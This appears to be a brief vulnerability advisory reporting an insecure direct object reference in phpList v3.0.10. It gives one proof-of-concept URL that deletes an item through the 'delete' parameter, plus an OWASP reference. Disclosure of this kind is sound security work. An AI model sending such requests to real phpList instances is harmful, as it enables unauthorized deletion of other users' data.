# Affected software: phplist
# Type of vulnerability: insecure object reference
# URL:phplist.com
# Discovered by: Provensec
# Website: http://www.provensec.com
#version: phpList ltd. - v3.0.10
# Proof of concept
insecure object refrenced on page deltetation
vuln param:delete
example:
http://demo.phplist.com/lists/admin/?page=send&delete=2&tk=035d99
ref:
https://www.owasp.org/index.php/Testing_for_Insecure_Direct_Object_References_%28OTG-AUTHZ-004%29
